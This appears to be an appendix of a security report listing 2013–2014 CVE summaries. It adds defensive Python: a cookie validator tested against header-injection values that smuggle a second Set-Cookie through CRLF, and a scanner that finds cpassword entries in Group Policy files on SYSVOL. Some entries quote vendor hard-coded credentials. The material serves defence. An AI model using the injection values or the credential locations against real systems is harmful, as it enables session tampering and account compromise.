CVE-2013-5057: hxds.dll in Microsoft Office 2007 SP3 and 2010 SP1 and SP2 does not implement the ASLR protection mechanism, which makes it easier for remote attackers to execute arbitrary code via a crafted COM component on a web site that is visited with Internet Explorer, as exploited in the wild in December 2013, aka "HXDS ASLR Vulnerability".
CVE-2013-5369: IBM SPSS Analytical Decision Management 6.1 before IF1, 6.2 before IF1, and 7.0 before FP1 IF6 might allow remote attackers to execute arbitrary code by deploying and accessing a service.
CVE-2013-5428: IBM WebSphere DataPower XC10 appliances 2.5.0 do not require authentication for all administrative actions, which allows remote attackers to cause a denial of service via unspecified vectors.
CVE-2013-5431: Open redirect vulnerability in IBM Tivoli Federated Identity Manager (TFIM) 6.1.1 before IF 15, 6.2.0 before IF 14, 6.2.1, and 6.2.2 before IF 8 and Tivoli Federated Identity Manager Business Gateway (TFIMBG) 6.1.1 before IF 15, 6.2.0 before IF 14, 6.2.1, and 6.2.2 before IF 8 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.
CVE-2013-5494: Cross-site request forgery (CSRF) vulnerability in the web framework in Cisco Unified MeetingPlace Solution, as used in Unified MeetingPlace Web Conferencing and Unified MeetingPlace, allows remote attackers to hijack the authentication of arbitrary users, aka Bug IDs CSCui45209 and CSCui44674.
CVE-2013-5507: The IPsec implementation in Cisco Adaptive Security Appliance (ASA) Software 9.1 before 9.1(1.7), when an IPsec VPN tunnel is enabled, allows remote attackers to cause a denial of service (device reload) via a (1) ICMP or (2) ICMPv6 packet that is improperly handled during decryption, aka Bug ID CSCue18975.
CVE-2013-5536: Cisco Secure Access Control System (ACS) does not properly implement an incoming-packet firewall rule, which allows remote attackers to cause a denial of service (process crash) via a flood of crafted packets, aka Bug ID CSCui51521.
CVE-2013-5559: Buffer overflow in the Active Template Library (ATL) framework in the VPNAPI COM module in Cisco AnyConnect Secure Mobility Client 2.x allows user-assisted remote attackers to execute arbitrary code via a crafted HTML document, aka Bug ID CSCuj58139.
CVE-2013-5561: The Safe Search enforcement feature in Cisco Adaptive Security Appliance (ASA) CX Context-Aware Security software does not properly perform filtering, which allows remote attackers to bypass intended policy restrictions via unspecified vectors, aka Bug ID CSCui94622.
CVE-2013-5751: Directory traversal vulnerability in SAP NetWeaver 7.x allows remote attackers to read arbitrary files via unspecified vectors.
CVE-2013-5757: Absolute path traversal vulnerability in Yealink VoIP Phone SIP-T38G allows remote authenticated users to read arbitrary files via a full pathname in the dumpConfigFile function in the command parameter to cgi-bin/cgiServer.exx.
CVE-2013-5828: Unspecified vulnerability in the Enterprise Manager Base Platform component in Oracle Enterprise Manager Grid Control EM Base Platform 10.2.0.5 and 11.1.0.1; EM DB Control 11.1.0.7, 11.2.0.2, and 11.2.0.3; and EM Plugin for DB 12.1.0.2 and 12.1.0.3 allows remote attackers to affect integrity via unknown vectors related to Storage Management.
CVE-2013-6167: Mozilla Firefox through 27 sends HTTP Cookie headers without first validating that they have the required character-set restrictions, which allows remote attackers to conduct the equivalent of a persistent Logout CSRF attack via a crafted parameter that forces a web application to set a malformed cookie within an HTTP response.
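CVE-2013-6167 needed two parties: a browser that forwarded cookie bytes RFC 6265 forbids, and a web application that echoed an attacker-controlled parameter into a Set-Cookie header in the first place. The server-side check a practitioner would want is a strict cookie-name and cookie-value validator applied before any header is emitted. The Python below is an added example written for this appendix, not code from Mozilla or from any affected application; the sample attacker values are constructed, and the `build_set_cookie` helper is a hypothetical stand-in for whatever the application uses to emit headers.

```python
import re

# RFC 6265 cookie-octet: %x21 / %x23-2B / %x2D-3A / %x3C-5B / %x5D-7E, i.e.
# printable US-ASCII except CTLs, space, DQUOTE, comma, semicolon, backslash.
_COOKIE_OCTETS = re.compile(r"[\x21\x23-\x2B\x2D-\x3A\x3C-\x5B\x5D-\x7E]*")
# RFC 2616 token (cookie-name): one or more chars, no CTLs, no separators.
_TOKEN = re.compile(r"[!#$%&'*+\-.^_`|~0-9A-Za-z]+")


def is_valid_cookie_name(name: str) -> bool:
    return _TOKEN.fullmatch(name) is not None


def is_valid_cookie_value(value: str) -> bool:
    """cookie-value = *cookie-octet / ( DQUOTE *cookie-octet DQUOTE )."""
    if len(value) >= 2 and value[0] == '"' and value[-1] == '"':
        value = value[1:-1]
    return _COOKIE_OCTETS.fullmatch(value) is not None


def is_valid_cookie_path(path: str) -> bool:
    """path-value = <any CHAR except CTLs or ';'> per RFC 6265 section 4.1.1."""
    return ";" not in path and not any(ord(c) < 0x20 or ord(c) == 0x7F for c in path)


def build_set_cookie(name: str, value: str, path: str = "/") -> str:
    """Hardened form: validate before emitting. A ';' or CR/LF in an
    attacker-controlled value would otherwise smuggle extra attributes or a
    second header into the response, which is how a malformed cookie with
    attacker-chosen attributes gets planted in the victim's browser."""
    if not is_valid_cookie_name(name):
        raise ValueError(f"invalid cookie name: {name!r}")
    if not is_valid_cookie_value(value):
        raise ValueError(f"invalid cookie value: {value!r}")
    if not is_valid_cookie_path(path):
        raise ValueError(f"invalid cookie path: {path!r}")
    return f"{name}={value}; Path={path}; Secure; HttpOnly"


if __name__ == "__main__":
    # Constructed inputs: a normal session id, then two attacker-controlled
    # parameter values of the kind a vulnerable application would echo back.
    for candidate in ("k7Qz9mX2",
                      "x;Expires=Thu, 01 Jan 1970 00:00:00 GMT",
                      "a\r\nSet-Cookie: evil=1"):
        try:
            print(build_set_cookie("sid", candidate))
        except ValueError as exc:
            print("rejected:", exc)
```

Rejecting rather than sanitising is deliberate: a value that fails the grammar is already evidence of tampering, and stripping characters would leave the application guessing at what the attacker intended.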
CVE-2013-6188: Cross-site request forgery (CSRF) vulnerability in HP System Management Homepage (SMH) 7.1 through 7.2.2 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.
CVE-2013-6284: Unspecified vulnerability in the Statutory Reporting for Insurance (FS-SR) component in the Financial Services module for SAP ERP Central Component (ECC) allows attackers to execute arbitrary code via unspecified vectors, related to a "code injection vulnerability".
CVE-2013-6396: The OpenStack Python client library for Swift (python-swiftclient) 1.0 through 1.9.0 does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.
CVE-2013-6475: Multiple integer overflows in (1) OPVPOutputDev.cxx and (2) oprs/OPVPSplash.cxx in the pdftoopvp filter in CUPS and cups-filters before 1.0.47 allow remote attackers to execute arbitrary code via a crafted PDF file, which triggers a heap-based buffer overflow.
CVE-2013-6660: The drag-and-drop implementation in Google Chrome before 33.0.1750.117 does not properly restrict the information in WebDropData data structures, which allows remote attackers to discover full pathnames via a crafted web site.
CVE-2013-6699: The Control and Provisioning of Wireless Access Points (CAPWAP) protocol implementation on Cisco Wireless LAN Controller (WLC) devices allows remote attackers to cause a denial of service via a crafted CAPWAP packet that triggers a buffer over-read, aka Bug ID CSCuh81880.
CVE-2013-6702: The management implementation on Cisco ONS 15454 controller cards with software 9.8 and earlier allows remote attackers to cause a denial of service (card reset) via crafted packets, aka Bug ID CSCtz50902.
CVE-2013-6979: The VTY authentication implementation in Cisco IOS XE 03.02.xx.SE and 03.03.xx.SE incorrectly relies on the Linux-IOS internal-network configuration, which allows remote attackers to bypass authentication by leveraging access to a 192.168.x.2 source IP address, aka Bug ID CSCuj90227.
CVE-2013-6994: OpenText Exceed OnDemand (EoD) 8 transmits the session ID in cleartext, which allows remote attackers to perform session fixation attacks by sniffing the network.
CVE-2013-7004: D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 have a hardcoded account of username gkJ9232xXyruTRmY, which makes it easier for remote attackers to obtain access by leveraging knowledge of the username.
CVE-2013-7043: Multiple cross-site request forgery (CSRF) vulnerabilities on Cisco Scientific Atlanta DPR2320R2 routers with software 2.0.2r1262-090417 allow remote attackers to hijack the authentication of administrators for requests that (1) change a password via the Password parameter to goform/RgSecurity, (2) reboot the device via the Restart parameter to goform/restart, (3) modify Wi-Fi settings, as demonstrated by the WpaPreSharedKey parameter to goform/wlanSecurity, or (4) modify parental controls via the ParentalPassword parameter to goform/RgParentalBasic.
CVE-2013-7389: Multiple cross-site scripting (XSS) vulnerabilities in D-Link DIR-645 Router (Rev. A1) with firmware before 1.04B11 allow remote attackers to inject arbitrary web script or HTML via the (1) deviceid parameter to parentalcontrols/bind.php, (2) RESULT parameter to info.php, or (3) receiver parameter to bsc_sms_send.php.
CVE-2014-0001: Buffer overflow in client/mysql.cc in Oracle MySQL and MariaDB before 5.5.35 allows remote database servers to cause a denial of service (crash) and possibly execute arbitrary code via a long server version string.
CVE-2014-0035: The SymmetricBinding in Apache CXF before 2.6.13 and 2.7.x before 2.7.10, when EncryptBeforeSigning is enabled and the UsernameToken policy is set to an EncryptedSupportingToken, transmits the UsernameToken in cleartext, which allows remote attackers to obtain sensitive information by sniffing the network.
CVE-2014-0160: The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.
CVE-2014-0207: The cdf_read_short_sector function in cdf.c in file before 5.19, as used in the Fileinfo component in PHP before 5.4.30 and 5.5.x before 5.5.14, allows remote attackers to cause a denial of service (assertion failure and application exit) via a crafted CDF file.
CVE-2014-0259: Microsoft Word 2007 SP3 and Office Compatibility Pack SP3 allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted Office document, aka "Word Memory Corruption Vulnerability".
CVE-2014-0266: The XMLHTTP ActiveX controls in XML Core Services 3.0 in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow remote attackers to bypass the Same Origin Policy via a web page that is visited in Internet Explorer, aka "MSXML Information Disclosure Vulnerability".
CVE-2014-0294: Microsoft Forefront Protection 2010 for Exchange Server does not properly parse e-mail content, which might allow remote attackers to execute arbitrary code via a crafted message, aka "RCE Vulnerability".
CVE-2014-0313: Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-0321.
CVE-2014-0354: The ZyXEL Wireless N300 NetUSB NBG-419N router with firmware 1.00(BFQ.6)C0 has a hardcoded password of qweasdzxc for an unspecified account, which allows remote attackers to obtain index.asp login access via an HTTP request.
CVE-2014-0362: Cross-site scripting (XSS) vulnerability on Google Search Appliance (GSA) devices before 7.0.14.G.216 and 7.2 before 7.2.0.G.114, when dynamic navigation is configured, allows remote attackers to inject arbitrary web script or HTML via input included in a SCRIPT element.
CVE-2014-0433: Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.6.13 and earlier allows remote attackers to affect availability via unknown vectors related to Thread Pooling.
CVE-2014-0488: APT before 1.0.9 does not "invalidate repository data" when moving from an unauthenticated to authenticated state, which allows remote attackers to have unspecified impact via crafted repository data.
CVE-2014-0493: Adobe Reader and Acrobat 10.x before 10.1.9 and 11.x before 11.0.06 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2014-0495.
CVE-2014-0494: Adobe Digital Editions 2.0.1 allows attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via unspecified vectors.
CVE-2014-0498: Stack-based buffer overflow in Adobe Flash Player before 11.7.700.269 and 11.8.x through 12.0.x before 12.0.0.70 on Windows and Mac OS X and before 11.2.202.341 on Linux, Adobe AIR before 4.0.0.1628 on Android, Adobe AIR SDK before 4.0.0.1628, and Adobe AIR SDK & Compiler before 4.0.0.1628 allows attackers to execute arbitrary code via unspecified vectors.
CVE-2014-0515: Buffer overflow in Adobe Flash Player before 11.7.700.279 and 11.8.x through 13.0.x before 13.0.0.206 on Windows and OS X, and before 11.2.202.356 on Linux, allows remote attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in April 2014.
CVE-2014-0533: Cross-site scripting (XSS) vulnerability in Adobe Flash Player before 13.0.0.223 and 14.x before 14.0.0.125 on Windows and OS X and before 11.2.202.378 on Linux, Adobe AIR before 14.0.0.110, Adobe AIR SDK before 14.0.0.110, and Adobe AIR SDK & Compiler before 14.0.0.110 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2014-0531 and CVE-2014-0532.
CVE-2014-0536: Adobe Flash Player before 13.0.0.223 and 14.x before 14.0.0.125 on Windows and OS X and before 11.2.202.378 on Linux, Adobe AIR before 14.0.0.110, Adobe AIR SDK before 14.0.0.110, and Adobe AIR SDK & Compiler before 14.0.0.110 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors.
CVE-2014-0562: Cross-site scripting (XSS) vulnerability in Adobe Reader and Acrobat 10.x before 10.1.12 and 11.x before 11.0.09 on OS X allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka "Universal XSS (UXSS)".
CVE-2014-0577: Adobe Flash Player before 13.0.0.252 and 14.x and 15.x before 15.0.0.223 on Windows and OS X and before 11.2.202.418 on Linux, Adobe AIR before 15.0.0.356, Adobe AIR SDK before 15.0.0.356, and Adobe AIR SDK & Compiler before 15.0.0.356 allow attackers to execute arbitrary code by leveraging an unspecified "type confusion", a different vulnerability than CVE-2014-0584, CVE-2014-0585, CVE-2014-0586, and CVE-2014-0590.
CVE-2014-0765: Stack-based buffer overflow in Advantech WebAccess before 7.2 allows remote attackers to execute arbitrary code via a long GotoCmd argument.
CVE-2014-0767: Stack-based buffer overflow in Advantech WebAccess before 7.2 allows remote attackers to execute arbitrary code via a long AccessCode argument.
CVE-2014-0783: Stack-based buffer overflow in BKHOdeq.exe in Yokogawa CENTUM CS 3000 R3.09.50 and earlier allows remote attackers to execute arbitrary code via a crafted TCP packet.
CVE-2014-1330: WebKit, as used in Apple Safari before 6.1.4 and 7.x before 7.0.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-05-21-1.
CVE-2014-1342: WebKit, as used in Apple Safari before 6.1.4 and 7.x before 7.0.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-05-21-1.
CVE-2014-1349: Use-after-free vulnerability in Safari in Apple iOS before 7.1.2 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via an invalid URL.
CVE-2014-1356: Heap-based buffer overflow in launchd in Apple iOS before 7.1.2, Apple OS X before 10.9.4, and Apple TV before 6.1.2 allows attackers to execute arbitrary code via a crafted application that sends IPC messages.
CVE-2014-1370: The byte-swapping implementation in copyfile in Apple OS X before 10.9.4 allows remote attackers to execute arbitrary code or cause a denial of service (out-of-bounds memory access and application crash) via a crafted AppleDouble file in a ZIP archive.
CVE-2014-1379: Graphics Drivers in Apple OS X before 10.9.4 allows attackers to gain privileges or cause a denial of service (NULL pointer dereference and system crash) via a 32-bit executable file for a crafted application.
CVE-2014-1382: WebKit, as used in Apple iOS before 7.1.2, Apple Safari before 6.1.5 and 7.x before 7.0.5, and Apple TV before 6.1.2, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-06-30-1, APPLE-SA-2014-06-30-3, and APPLE-SA-2014-06-30-4.
CVE-2014-1466: SQL injection vulnerability in CSP MySQL User Manager 2.3 allows remote attackers to execute arbitrary SQL commands via the login field of the login page.
CVE-2014-1472: Multiple cross-site scripting (XSS) vulnerabilities in the Enterprise Manager in McAfee Vulnerability Manager (MVM) 7.5.5 and earlier allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
CVE-2014-1477: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 27.0, Firefox ESR 24.x before 24.3, Thunderbird before 24.3, and SeaMonkey before 2.24 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
CVE-2014-1518: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 29.0, Firefox ESR 24.x before 24.5, Thunderbird before 24.5, and SeaMonkey before 2.26 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
CVE-2014-1563: Use-after-free vulnerability in the mozilla::DOMSVGLength::GetTearOff function in Mozilla Firefox before 32.0, Firefox ESR 31.x before 31.1, and Thunderbird 31.x before 31.1 allows remote attackers to execute arbitrary code or cause a denial of service (heap memory corruption) via an SVG animation with DOM interaction that triggers incorrect cycle collection.
CVE-2014-1565: The mozilla::dom::AudioEventTimeline function in the Web Audio API implementation in Mozilla Firefox before 32.0, Firefox ESR 31.x before 31.1, and Thunderbird 31.x before 31.1 does not properly create audio timelines, which allows remote attackers to obtain sensitive information from process memory or cause a denial of service (out-of-bounds read) via crafted API calls.
CVE-2014-1586: content/base/src/nsDocument.cpp in Mozilla Firefox before 33.0, Firefox ESR 31.x before 31.2, and Thunderbird 31.x before 31.2 does not consider whether WebRTC video sharing is occurring, which allows remote attackers to obtain sensitive information from the local camera in certain IFRAME situations by maintaining a session after the user temporarily navigates away.
CVE-2014-1701: The GenerateFunction function in bindings/scripts/code_generator_v8.pm in Blink, as used in Google Chrome before 33.0.1750.149, does not implement a certain cross-origin restriction for the EventTarget::dispatchEvent function, which allows remote attackers to conduct Universal XSS (UXSS) attacks via vectors involving events.
CVE-2014-1740: Multiple use-after-free vulnerabilities in net/websockets/websocket_job.cc in the WebSockets implementation in Google Chrome before 34.0.1847.137 allow remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to WebSocketJob deletion.
CVE-2014-1744: Integer overflow in the AudioInputRendererHost::OnCreateStream function in content/browser/renderer_host/media/audio_input_renderer_host.cc in Google Chrome before 35.0.1916.114 allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors that trigger a large shared-memory allocation.
CVE-2014-1753: Microsoft Internet Explorer 6 through 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".
CVE-2014-1806: The .NET Remoting implementation in Microsoft .NET Framework 1.1 SP1, 2.0 SP2, 3.5, 3.5.1, 4, 4.5, and 4.5.1 does not properly restrict memory access, which allows remote attackers to execute arbitrary code via vectors involving malformed objects, aka "TypeFilterLevel Vulnerability".
CVE-2014-1808: Microsoft Office 2013 Gold, SP1, RT, and RT SP1 allows remote attackers to obtain sensitive token information via a web site that sends a crafted response during opening of an Office document, aka "Token Reuse Vulnerability".
CVE-2014-1811: The TCP implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allows remote attackers to cause a denial of service (non-paged pool memory consumption and system hang) via malformed data in the Options field of a TCP header, aka "TCP Denial of Service Vulnerability".
CVE-2014-1812: The Group Policy implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 does not properly handle distribution of passwords, which allows remote authenticated users to obtain sensitive credential information and consequently gain privileges by leveraging access to the SYSVOL share, as exploited in the wild in May 2014, aka "Group Policy Preferences Password Elevation of Privilege Vulnerability".
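CVE-2014-1812 matters after patching as well: MS14-025 stopped new passwords being written through Group Policy Preferences, but preference XML files already on the SYSVOL share keep their stored password until an administrator deletes or re-creates them, and every domain user can read SYSVOL. The Python below is an added example for this appendix, not Microsoft tooling: it parses Preferences XML and reports every element that carries a `cpassword` attribute so the files can be cleaned up. The attribute and file names follow Microsoft's GPP documentation rather than this report; the sample XML, GUIDs, account names and UNC paths are constructed.

```python
import xml.etree.ElementTree as ET
from typing import Dict, List

# Group Policy Preferences XML under SYSVOL (Groups.xml, Services.xml,
# ScheduledTasks.xml, DataSources.xml, Drives.xml, Printers.xml) stores a
# configured password in the 'cpassword' attribute of a <Properties> element.
# Attribute and file names follow Microsoft's GPP documentation (MS14-025);
# everything below (XML, GUIDs, names, paths, the cpassword string) is
# constructed for this example and is not real key or credential material.

GROUPS_XML = """<Groups clsid="{00000000-0000-0000-0000-000000000001}">
  <User clsid="{00000000-0000-0000-0000-000000000002}" name="svc_backup"
        changed="2014-03-01 10:00:00" uid="{00000000-0000-0000-0000-000000000003}">
    <Properties action="U" newName="" fullName="" description="Backup service"
                cpassword="RkFLRS1DUEFTU1dPUkQtRk9SLURFTU8=" changeLogon="0"
                noChange="1" neverExpires="1" acctDisabled="0" userName="svc_backup"/>
  </User>
</Groups>"""

DRIVES_XML = """<Drives clsid="{00000000-0000-0000-0000-000000000004}">
  <Drive clsid="{00000000-0000-0000-0000-000000000005}" name="S:">
    <Properties action="U" thisDrive="NOCHANGE" allDrives="NOCHANGE"
                userName="" path="\\\\fileserver\\share" label="Shared"/>
  </Drive>
</Drives>"""


def find_cpassword(xml_text: str, source: str) -> List[Dict[str, str]]:
    """Return one finding per element that carries a cpassword attribute."""
    findings: List[Dict[str, str]] = []
    for elem in ET.fromstring(xml_text).iter():
        cpassword = elem.attrib.get("cpassword")
        if cpassword is None:
            continue
        findings.append({
            "source": source,
            "element": elem.tag,
            "userName": elem.attrib.get("userName", ""),
            "action": elem.attrib.get("action", ""),
            # Report presence only; never copy the ciphertext into a log.
            "cpassword_present": "yes" if cpassword else "no",
        })
    return findings


def scan_sysvol(files: Dict[str, str]) -> List[Dict[str, str]]:
    """files maps a Preferences file path to its contents (in practice read
    from \\\\<domain>\\SYSVOL\\<domain>\\Policies\\*). Malformed XML is skipped."""
    results: List[Dict[str, str]] = []
    for path, text in files.items():
        try:
            results.extend(find_cpassword(text, path))
        except ET.ParseError:
            continue
    return results


# Constructed stand-in for a directory walk of the SYSVOL share.
SAMPLE_FILES = {
    r"\\corp.example\SYSVOL\corp.example\Policies\{00000000-0000-0000-0000-0000000000AA}\Machine\Preferences\Groups\Groups.xml": GROUPS_XML,
    r"\\corp.example\SYSVOL\corp.example\Policies\{00000000-0000-0000-0000-0000000000BB}\User\Preferences\Drives\Drives.xml": DRIVES_XML,
}

if __name__ == "__main__":
    for finding in scan_sysvol(SAMPLE_FILES):
        print(finding)
```

Any hit is a credential to rotate, not just a file to delete: the password has been readable by every authenticated user for as long as the XML has existed, so the account should be treated as compromised.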
CVE-2014-2014: imapsync before 1.584, when running with the --tls option, attempts a cleartext login when a certificate verification failure occurs, which allows remote attackers to obtain credentials by sniffing the network.
CVE-2014-2103: Cisco Intrusion Prevention System (IPS) Software allows remote attackers to cause a denial of service (MainApp process outage) via malformed SNMP packets, aka Bug IDs CSCum52355 and CSCul49309.
CVE-2014-2109: The TCP Input module in Cisco IOS 12.2 through 12.4 and 15.0 through 15.4, when NAT is used, allows remote attackers to cause a denial of service (memory consumption or device reload) via crafted TCP packets, aka Bug IDs CSCuh33843 and CSCuj41494.
CVE-2014-2364: Multiple stack-based buffer overflows in Advantech WebAccess before 7.2 allow remote attackers to execute arbitrary code via a long string in the (1) ProjectName, (2) SetParameter, (3) NodeName, (4) CCDParameter, (5) SetColor, (6) AlarmImage, (7) GetParameter, (8) GetColor, (9) ServerResponse, (10) SetBaud, or (11) IPAddress parameter to an ActiveX control in (a) webvact.ocx, (b) dvs.ocx, or (c) webdact.ocx.
CVE-2014-2416: Unspecified vulnerability in the Oracle Data Integrator component in Oracle Fusion Middleware 11.1.1.3.0 allows remote attackers to affect availability via unknown vectors related to Data Quality, a different vulnerability than CVE-2014-2407, CVE-2014-2415, CVE-2014-2417, and CVE-2014-2418.
CVE-2014-2554: OTRS 3.1.x before 3.1.21, 3.2.x before 3.2.16, and 3.3.x before 3.3.6 allows remote attackers to conduct clickjacking attacks via an IFRAME element.
CVE-2014-2643: Unspecified vulnerability in HP Systems Insight Manager (SIM) before 7.4 allows remote authenticated users to gain privileges via unknown vectors.
CVE-2014-2742: Isode M-Link before 16.0v7 does not properly restrict the processing of compressed XML elements, which allows remote attackers to cause a denial of service (resource consumption) via a crafted XMPP stream, aka an "xmppbomb" attack.
CVE-2014-2768: Microsoft Internet Explorer 6 through 8 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2773.
CVE-2014-2789: Microsoft Internet Explorer 8 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2795, CVE-2014-2798, and CVE-2014-2804.
CYBER SECURITY CONTROLS EFFECTIVENESS — Security Lancaster. Page 24 of 28
CVE-2014-2791: Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."
CVE-2014-2794: Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2788.
CVE-2014-2808: Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2796, CVE-2014-2825, CVE-2014-4050, CVE-2014-4055, and CVE-2014-4067.
CVE-2014-2821: Microsoft Internet Explorer 8 and 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."
CVE-2014-3444: The GetGUID function in codecs/dmp4.dll in RealNetworks RealPlayer 16.0.3.51 and earlier allows remote attackers to execute arbitrary code or cause a denial of service (write access violation and application crash) via a malformed 3gp file.
CVE-2014-3489: lib/util/miq-password.rb in Red Hat CloudForms 3.0 Management Engine (CFME) before 5.2.4.2 uses a hard-coded salt, which makes it easier for remote attackers to guess passwords via a brute force attack.
CVE-2014-3507: Memory leak in d1_both.c in the DTLS implementation in OpenSSL 0.9.8 before 0.9.8zb, 1.0.0 before 1.0.0n, and 1.0.1 before 1.0.1i allows remote attackers to cause a denial of service (memory consumption) via zero-length DTLS fragments that trigger improper handling of the return value of a certain insert function.
CVE-2014-3556: The STARTTLS implementation in mail/ngx_mail_smtp_handler.c in the SMTP proxy in nginx 1.5.x and 1.6.x before 1.6.1 and 1.7.x before 1.7.4 does not properly restrict I/O buffering, which allows man-in-the-middle attackers to insert commands into encrypted SMTP sessions by sending a cleartext command that is processed after TLS is in place, related to a "plaintext command injection" attack, a similar issue to CVE-2011-0411.
CVE-2014-3580: The mod_dav_svn Apache HTTPD server module in Apache Subversion 1.x before 1.7.19 and 1.8.x before 1.8.11 allows remote attackers to cause a denial of service (NULL pointer dereference and server crash) via a REPORT request for a resource that does not exist.
CVE-2014-3814: The Juniper Networks NetScreen Firewall devices with ScreenOS before 6.3r17, when configured to use the internal DNS lookup client, allows remote attackers to cause a denial of service (crash and reboot) via a sequence of malformed packets to the device IP.
CVE-2014-3819: Juniper Junos 11.4 before 11.4R12, 12.1 before 12.1R10, 12.1X44 before 12.1X44-D35, 12.1X45 before 12.1X45-D25, 12.1X46 before 12.1X46-D20, 12.1X47 before 12.1X47-D10, 12.2 before 12.2R8, 12.3 before 12.3R7, 13.1 before 13.1R4, 13.2 before 13.2R4, 13.3 before 13.3R2, and 14.1 before 14.1R1, when Auto-RP is enabled, allows remote attackers to cause a denial of service (RDP routing process crash and restart) via a malformed PIM packet.
CVE-2014-3872: Multiple SQL injection vulnerabilities in the administration login page in D-Link DAP-1350 (Rev. A1) with firmware 1.14 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) username or (2) password.
CVE-2014-4044: OpenAFS 1.6.8 does not properly clear the fields in the host structure, which allows remote attackers to cause a denial of service (uninitialized memory access and crash) via unspecified vectors related to TMAY requests.
CVE-2014-4079: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4100, CVE-2014-4103, CVE-2014-4104, CVE-2014-4105, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.
CVE-2014-4082: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."
CVE-2014-4100: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4079, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4103, CVE-2014-4104, CVE-2014-4105, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.
